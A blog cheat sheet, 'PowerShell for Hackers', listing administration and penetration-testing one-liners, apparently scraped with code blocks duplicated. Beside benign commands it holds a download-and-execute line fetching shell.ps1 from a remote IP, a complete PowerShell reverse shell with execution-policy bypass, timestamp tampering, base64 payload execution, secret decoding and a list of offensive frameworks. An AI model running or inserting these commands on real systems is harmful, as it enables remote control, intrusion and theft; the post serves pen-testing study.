PowerShell for Hackers

Jamie Bowman

January 23, 2020

PowerShell for Hackers

As I’m learning more PowerShell and dabbling into hacking I will be composing a list of techniques and scripts that I find very beneficial for administration and pen-testing.

Basics

ipconfig

ipconfig

Linux Like Watch Command

while (1) { docker ps -a ; sleep 5}

1	while (1) { docker ps -a ; sleep 5}

System Running Processes

Get-Process

1	Get-Process

IP to Hostname

[System.Net.Dns]::GetHostByAddress('192.168.0.10').HostName

1	[System.Net.Dns]::GetHostByAddress('192.168.0.10').HostName

Is Server Virtual or Physical?

systeminfo /s %computername% | findstr /c:"Model:" /c:"Host Name" /c:"OS Name"

1	systeminfo /s %computername% \| findstr /c:"Model:" /c:"Host Name" /c:"OS Name"

Lookup User Information

# get domain information of a user
net user /domain jamie.bowman

# get groups of current user
whoami /groups

# get domain information of a user

net user /domain jamie.bowman

# get groups of current user

whoami /groups

Change File Modified Date and Time

(dir sample_file.txt).LastWriteTime = New-object DateTime 1976,12,31

1	(dir sample_file.txt).LastWriteTime = New-object DateTime 1976,12,31

Find Apps Running on Port

# finds pids using port 53
Get-Process -Id (Get-NetTCPConnection -LocalPort 53).OwningProcess

# find pids listening on port 80
netstat -ano | findstr ":80"

# look up pids
tasklist | findstr "4"

# finds pids using port 53

Get-Process -Id (Get-NetTCPConnection -LocalPort 53).OwningProcess

# find pids listening on port 80

netstat -ano | findstr ":80"

# look up pids

tasklist | findstr "4"

Base64

# convert to base64
[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('whoami'))
# d2hvYW1p

# convert from base64
[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))

# execute a base64 payload in powershell
powershell.exe -command "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))"

# convert to base64

[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('whoami'))

# d2hvYW1p

# convert from base64

[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))

# execute a base64 payload in powershell

powershell.exe -command "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))"

Querying Databases

https://gist.github.com/cmatskas/08411b916ab01e3f1439#file-powershellsqlquery-ps1

Domain Controllers

# get current domain name
$domainname = (Get-ADDomain).DNSRoot
 
# get all dcs
$dcs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem

# get current domain name

$domainname = (Get-ADDomain).DNSRoot

# get all dcs

$dcs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem

Downloading Files with PowerShell

# powershell one-liner using System.Net.WebClient
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.26/shell.ps1', 'shell.ps1')

# powershell one-liner using Invoke-WebRequest
Invoke-WebRequest -Uri 'http://10.10.14.26/shell.ps1'-OutFile 'shell.ps1'

# download and invoke execution
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26/shell.ps1')

# powershell one-liner using System.Net.WebClient

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.26/shell.ps1', 'shell.ps1')

# powershell one-liner using Invoke-WebRequest

Invoke-WebRequest -Uri 'http://10.10.14.26/shell.ps1'-OutFile 'shell.ps1'

# download and invoke execution

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26/shell.ps1')

PowerShell Reverse Shells

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell

Kubernetes

kubectl get secret/nameofsecret -o json | jq '.data | map_values(@base64d)'

Loading Executables in PowerShell

[Reflection.Assembly]::LoadFile("C:\Users\mrjamiebowman\Desktop\defnotmal.exe")
[DefNotMal.Program]::Main()

1 2	[Reflection.Assembly]::LoadFile("C:\Users\mrjamiebowman\Desktop\defnotmal.exe") [DefNotMal.Program]::Main()

If you screw up and have to unload your assembly try closing PowerShell. When an assembly is loaded like this in PowerShell it’s loaded into the AppDomain and remains there for the lifecycle of PowerShell.

Windows Exploit Suggester

While this is a python script. You will need to get the system info using PowerShell/CMD.

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

systeminfo

1	systeminfo

Copy and paste the results into a file and then commands can easily be ran against Windows Exploit Suggester which will help with privilege escalation.

PowerShell Frameworks & Tools

These are proven frameworks that can be used to reliably exploit a Windows environment.

Mimikatz (not PowerShell but runs alongside…)
Nishang
Empire Framework
PoshC2
PowerUpSQL
PowerSploit
p0wnedShell
Prowl
PSAttack
Pupy
SharpSocks (C# but deployed by PowerShell)

Using Vim with PowerShell

First, you’ll need to install Vim. Download, run and install the file “gvim82.exe” (as of 02/06/2020)…

https://www.vim.org/download.php#pc

Once Vim is installed you’ll need to run PowerShell in Administrator mode to configure the integration.

# install
Install-Package -Name PSReadline -Force -SkipPublisherCheck

# create aliases
New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'
New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vim edit mode
Set-PSReadlineOption -EditMode vi -BellStyle None

# install

Install-Package -Name PSReadline -Force -SkipPublisherCheck

# create aliases

New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vim edit mode

Set-PSReadlineOption -EditMode vi -BellStyle None

You can learn more from this article.
https://codeandkeep.com/PowerShell-And-Vim/